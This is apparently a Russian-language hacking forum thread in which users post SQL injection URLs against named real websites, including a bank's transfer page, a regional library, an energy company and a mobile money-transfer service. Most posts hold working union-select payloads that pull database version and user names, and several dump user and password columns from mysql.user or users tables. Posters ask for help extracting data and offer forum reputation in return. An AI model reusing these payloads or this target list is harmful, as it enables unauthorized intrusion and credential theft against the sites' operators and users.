хаха еще один банк Code: http://www.[COLOR=Red]cash[/COLOR]service.ru/index.php?part=transfer&action=point&id=700%20union%20select%20version(),database(),version(),4/*
наслаждаемся rooтом Code: http://www.747.ru/board/main/show/?id=700%20union%20select%201,2,user,password,5,6,7,8,9,10%20from%20mysql.user/*
Code: http://www.luontais.info/luontais.pmd/foorumi/haastattelu?id=-7+union+select+1,2,3,user(),version(),database(),7,8/* Есть таблица users, но не смог вывести из неё колонки =\
Бавлинская централизованная библиотечная система Code: http://www.bavly-cbs.ru/news.php?id_new=-28+union+select+1,concat(user(),char(58),version(),char(58),database()),3/*
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/* Кто поможет вывести даные, дам +8 !
если правильно понял http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,concat(password,char(58),user),6,7,8,9,10+from+mysql.user+limit+0,1/* вывод в картинке и в титле
www.tdahp.ru Code: http://www.tdahp.ru/ru/zayavka/index.html?id_tovar=-2+union+select+concat(version(),char(58,58),database(),char(58,58),user()),2/* www.studygerman.ru Code: http://www.studygerman.ru/test/test.php?id=-1+union+select+1,2,convert(concat(version(),char(58,58),database(),char(58,58),user())+using+cp1251),4,5,6,7,8,9/* www.impactsoft.ru Code: http://www.impactsoft.ru/eng/clients.php?razdel_id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(version(),char(58,58),database(),char(58,58),user()),0x71),0x71),3,4,5,6/* www.icie.ru Code: http://www.icie.ru/press-centre/foto/?id=-4+union+select+concat(version(),char(58,58),database(),char(58,58),user())/* www.sacr.sk Code: http://www.sacr.sk/category2?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),char(58,58),database(),char(58,58),user()),12,13,14,15,16,7,18,19,20,21,22/*&lang=ru www.chelsi.ru Code: http://www.chelsi.ru/comment.php?idart=-11364+union+select+1,2,3,4,5,concat(version(),char(58,58),database(),char(58,58),user())/*
www.telme.sg аналог скайпа, только заточен под моб. тел., с сайта можно управлять счётом, переводить деньги можно только на банковский счёт /обманули, писали что можно и на вебмани / пользователей 50 тис., перебор через лимит. может комуто и пригодится админку не нашёл, но таблица есть
Code: http://pribalt.info/arhiv.php?month=-4+union+select+1,2,3,4,concat(password,char(58)%20user),6,7,8,9,10+from+mysql.passw,3/* pribalt.info
Если бы не эта попка прошёл бы мимо : Вот скуля попки : Code: http://www.nnmed.ru/new.php?id_new=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
www.fasie.ru Code: http://www.fasie.ru/index.php?rid=-999+union+select+1,2,concat(version(),char(58,58),database(),char(58,58),user()),4,5/* P.S. Проверил тут _http://hlamidnik.h18.ru/SQLS.html, имхо не боян
Code: http://www.audit-paritet.ru/buh.php?id_new=-1950+union+select+1,2,concat(user(),char(58),VERSION()),4,5,6/* Code: http://www.autoindex.ru/news/index.php?id_news=-4984+union+select+1,2,3,4,5,6,7,8,9,10/* =)
Подмосоковье.ру =) Code: http://www.podmoskowie.ru/include/extra_pic.inc.php?pfl_id=-2+union+select+1,2,concat(char(58,58),version(),char(58,58),database(),char(58,58),user(),char(58,58)),4/*
Code: http://www.teatrdoc.ru/plays.php?id=-5+union+select+version(),2,3,4/* Code: http://www.kspz.ru/items.phtml?id=-3+union+select+version()/* Code: http://www.centresh.ru/article.php?id=-5+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),3,4,5,6,7/* Code: http://foto-oboi.ru/showo.php?id=-3+union+select+1,2,3,4,concat(name,char(58),password),6,7,8,9,10+from+users+limit+3,1/*
что-то непонятное: http://www.unccd.int/ngo/accreditationDB/institutionDetails.php?id=1+order+by+29-- 2_Pantera_, а фотообои кажись уже были
